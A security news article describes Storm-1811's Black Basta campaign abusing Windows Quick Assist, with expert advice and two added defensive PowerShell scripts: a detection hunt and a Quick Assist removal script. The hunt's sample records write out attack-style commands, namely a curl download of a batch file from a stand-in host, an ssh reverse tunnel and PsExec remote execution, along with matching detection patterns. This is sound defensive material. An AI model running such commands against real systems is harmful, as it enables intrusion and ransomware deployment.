Windows Quick Assist Anchors Black Basta Ransomware Gambit

Publicated : 23/11/2024   Category : security

When abused by threat actors with sophisticated social-engineering chops, remote-access tools demand that enterprises remain sharp in both defense strategy and employee-awareness training.

Following a recently documented Black Basta ransomware vishing campaign, Microsoft Threat Intelligence said May 15 that a financially motivated threat actor it tracks as Storm-1811 has been following the same playbook since mid-April.
The threat group is running a socially engineered campaign that tricks victims into letting them use Quick Assist for remote access to their machines, by posing as trusted contacts such as Microsoft technical support or an IT professional from the targeted user's company.
Quick Assist is a Windows app that enables a person to share their Windows or macOS device with someone else over a remote connection.
Vishing campaigns in which a threat actor abuses a Windows remote-access app to deliver Black Basta ransomware demonstrate the risk inherent in such tools when they are paired with sophisticated social engineering. The threat demands a similarly savvy response from enterprise security teams, who must bolster their own vigilance and advise employees across the organization to do the same, experts say.
Once they have established trust and gained remote access, Storm-1811 uses this channel to deliver various malware to victim machines, culminating in the deployment of Black Basta ransomware for financial gain, according to a blog post by Microsoft Threat Intelligence. Victims also may be hit with a flood of emails followed by vishing calls from threat actors impersonating IT or help-desk personnel.
The attacks demonstrate how easily threat actors can abuse legitimate remote-access tools to deceive and compromise users, especially when their social-engineering skills are solid enough to get a victim to fall for a malicious ruse, security experts said.
Advanced social engineering attacks are what cybercriminals use when … they cannot breach [an organization] using simpler methods such as basic phishing emails or compromising weak credentials, notes Darren Guccione, CEO and co-founder of security firm Keeper Security, in an email to Dark Reading.
The growing sophistication that attackers have demonstrated with these tactics and their clever use of remote-access tools highlights the continued need for ongoing training and education of employees in how to spot such tricks as they evolve, he says.
Because Quick Assist allows the user to share their device over a remote connection, the application carries the potential for damaging malicious activity, Guccione says.
In the attack vector described by Microsoft Threat Intelligence, Storm-1811 either uses vishing to impersonate IT or help-desk personnel, pretending to conduct generic fixes on a device, or engages in email bombing to flood users' inboxes with content from services they've subscribed to.
Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue, according to Microsoft.
Indeed, this email bombing is a critical aspect of advanced social engineering, serving to overwhelm and confuse the victim before the attacker reaches out by phone to manipulate them into accepting a malicious Quick Assist request, Stephen Kowski, field CTO at SlashNext, notes.
Once this connection is set up, attackers are free to operate at will on the victim's machine. In the attacks described by both Rapid7 and Microsoft, this activity ultimately ends with the deployment of Black Basta ransomware.
Microsoft also observed Storm-1811 delivering a flurry of malware to victim machines in the lead-up to the Black Basta payload, including remote monitoring and management (RMM) tools such as ScreenConnect and NetSupport Manager, the Qakbot malware, and Cobalt Strike.
Once access was gained via Quick Assist, the attacker ran a scripted curl command to download a series of batch files or ZIP files used to deliver the varied malicious payloads. Some of the batch scripts suggested the use of fake spam filter updates that required the targets to provide sign-in credentials, according to Microsoft.
Storm-1811 then used Qakbot to deliver a Cobalt Strike Beacon, and next established persistence and conducted lateral movement within the compromised environment via ScreenConnect.
NetSupport Manager, another remote access tool, likely was deployed to maintain control over compromised devices to further download and install additional malware, as well as launch arbitrary commands, according to Microsoft.
In some cases, Storm-1811 also leveraged OpenSSH to establish a secure shell (SSH) tunnel for persistence. Eventually, the actor used PsExec to deploy Black Basta ransomware throughout the network.
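The chain described above (a Quick Assist session, then curl pulling batch or ZIP files, an OpenSSH tunnel, RMM clients and finally PsExec) lends itself to a simple correlation hunt. The following PowerShell is an added example and is not code from the article, from Microsoft's post or from Rapid7: it scans process-creation records, matches the tooling named in the article, and raises the severity of a match when Quick Assist started on the same host shortly beforehand. The field names (Time, Computer, Image, CommandLine), the window length and the sample records are constructed for the example; map them onto your own Sysmon Event ID 1 or EDR export before use.

```powershell
# Added example (not from the article, Microsoft or Rapid7). Assumes process-creation
# records exposed as objects with Time, Computer, Image and CommandLine properties.
function Find-QuickAssistFollowOn {
    param(
        [Parameter(Mandatory)] [object[]]$Events,
        [int]$WindowMinutes = 120   # assumption: how long after a Quick Assist start we stay suspicious
    )
    # Image-name and command-line patterns for the tradecraft the article describes.
    # PowerShell -match is case-insensitive, so QuickAssist.exe and quickassist.exe both match.
    $patterns = @(
        @{ Name = 'curl fetching batch/ZIP file'; Image = '\\curl\.exe$';               Cmd = '\.(bat|zip)(\s|"|''|$)' },
        @{ Name = 'OpenSSH reverse tunnel (-R)';   Image = '\\ssh\.exe$';                Cmd = '\s-[A-Za-z]*R\s' },
        @{ Name = 'PsExec remote execution';       Image = '\\psexe(c|svc)(64)?\.exe$';  Cmd = '.' },
        @{ Name = 'ScreenConnect client';          Image = '\\screenconnect[^\\]*\.exe$'; Cmd = '.' },
        @{ Name = 'NetSupport Manager client';     Image = '\\client32\.exe$';           Cmd = '.' }
    )
    $sorted   = $Events | Sort-Object Time
    $qaStarts = $sorted | Where-Object { $_.Image -match '\\quickassist\.exe$' }

    foreach ($e in $sorted) {
        foreach ($p in $patterns) {
            if ($e.Image -notmatch $p.Image -or $e.CommandLine -notmatch $p.Cmd) { continue }
            # Did Quick Assist start on this host within the window before this event?
            $inSession = $qaStarts | Where-Object {
                $_.Computer -eq $e.Computer -and
                $_.Time -le $e.Time -and
                $e.Time -le $_.Time.AddMinutes($WindowMinutes)
            }
            $severity = if ($inSession) { 'High: after Quick Assist start' } else { 'Medium' }
            [pscustomobject]@{
                Time        = $e.Time
                Computer    = $e.Computer
                Finding     = $p.Name
                Severity    = $severity
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample records (TEST-NET addresses, shortened WindowsApps path):
# WS-17 has a Quick Assist session followed by the chain; WS-22 fetches a ZIP
# with curl but has no Quick Assist session, and also runs a harmless curl.
$sample = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-10 09:00'; Computer = 'WS-17'
        Image = 'C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist\QuickAssist.exe'
        CommandLine = 'QuickAssist.exe' },
    [pscustomobject]@{ Time = [datetime]'2024-05-10 09:14'; Computer = 'WS-17'
        Image = 'C:\Windows\System32\curl.exe'
        CommandLine = 'curl.exe -o C:\Users\Public\upd.bat http://192.0.2.10/upd.bat' },
    [pscustomobject]@{ Time = [datetime]'2024-05-10 09:31'; Computer = 'WS-17'
        Image = 'C:\Windows\System32\OpenSSH\ssh.exe'
        CommandLine = 'ssh.exe -N -R 2222:127.0.0.1:3389 svc@192.0.2.10' },
    [pscustomobject]@{ Time = [datetime]'2024-05-10 10:40'; Computer = 'WS-17'
        Image = 'C:\Users\Public\PsExec64.exe'
        CommandLine = 'PsExec64.exe \\FS-01 -s -d cmd /c C:\Users\Public\upd.bat' },
    [pscustomobject]@{ Time = [datetime]'2024-05-10 09:20'; Computer = 'WS-22'
        Image = 'C:\Windows\System32\curl.exe'
        CommandLine = 'curl.exe -o tools.zip http://192.0.2.20/tools.zip' },
    [pscustomobject]@{ Time = [datetime]'2024-05-10 09:25'; Computer = 'WS-22'
        Image = 'C:\Windows\System32\curl.exe'
        CommandLine = 'curl.exe https://example.invalid/health' }
)

# Expected: three High findings on WS-17, one Medium on WS-22, nothing for the health check.
Find-QuickAssistFollowOn -Events $sample | Format-Table -AutoSize
```

Two caveats for production use. curl.exe ships with Windows and is widely used legitimately, so a lone "Medium" hit is a triage lead, not an alert; the correlation with a Quick Assist start is what carries the signal. The PsExec, ScreenConnect and NetSupport matches key on the image name and will miss renamed binaries, so in a real hunt match on the signer, file hash or Sysmon's OriginalFileName field as well.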
Given how exposed an organization is once a corporate user willingly gives attackers remote access to his or her machine, one way to mitigate such attacks is to block or uninstall tools such as Quick Assist where they are not in use, both Microsoft and experts advised.
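Removing Quick Assist from endpoints where nobody uses it is straightforward. The PowerShell below is an added example, not Microsoft's script or anything from the article: it reports every way Quick Assist can be present on a Windows 10/11 machine and removes it only when run with -Remove. It assumes Quick Assist is installed either as the "App.Support.QuickAssist" feature on demand (older builds) or as the "MicrosoftCorporationII.QuickAssist" Store package (current builds), and it must run from an elevated session.

```powershell
# Added example (not Microsoft's script): inventory and optionally remove Quick Assist.
# Run elevated. Without -Remove the script only reports what it finds.
param(
    [switch]$Remove
)

# 1. Feature on demand (how Quick Assist shipped on older Windows 10/11 builds)
$cap = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
       Where-Object State -eq 'Installed'
foreach ($c in $cap) {
    Write-Host "Quick Assist capability installed: $($c.Name)"
    if ($Remove) { Remove-WindowsCapability -Online -Name $c.Name | Out-Null }
}

# 2. Store package (current builds), checked across every user profile on the device
$pkg = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist'
foreach ($p in $pkg) {
    Write-Host "Quick Assist Store package installed: $($p.PackageFullName)"
    if ($Remove) { Remove-AppxPackage -AllUsers -Package $p.PackageFullName }
}

# 3. Provisioned copy, which would otherwise reinstall for each new user profile
$prov = Get-AppxProvisionedPackage -Online |
        Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist'
foreach ($pp in $prov) {
    Write-Host "Quick Assist provisioned for new users: $($pp.PackageName)"
    if ($Remove) { Remove-AppxProvisionedPackage -Online -PackageName $pp.PackageName | Out-Null }
}

if (-not $cap -and -not $pkg -and -not $prov) {
    Write-Host 'Quick Assist is not installed on this device.'
}
```

Removing the package does not stop a helper from reinstalling it from the Microsoft Store, so on managed fleets pair this with an AppLocker or WDAC rule that denies QuickAssist.exe, or with Store policy. Treat the same way any other remote-access tool the business does not actually use.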
Organizations also can implement a privileged access management (PAM) solution within a zero-trust architecture, which prevents unauthorized privilege escalation and ensures that user access roles are strongly enforced, Guccione says.
A major goal of zero trust is to limit users to the resources and information for which they are authorized, which reduces the blast radius in the event of a breach, he says.
Both Microsoft and experts also advised that organizations use advanced and consistent employee training to help staff spot vishing and social-engineering attacks, which can prevent compromise, even though Guccione acknowledged that anyone can fall for them.
Still, employees are better equipped to combat them when their organization provides regular security training and educates employees about malicious attachments, links, and tech support scams such as this, he says.
Event monitoring and advanced email solutions also can neutralize the email bombing tactic of such campaigns, causing the subsequent phone call to stand out as suspicious and illegitimate immediately, Kowski says.
Luckily, nowadays, GenAI phishing solutions are installed in five minutes without any changes in user experience or significant infrastructure changes, he says.
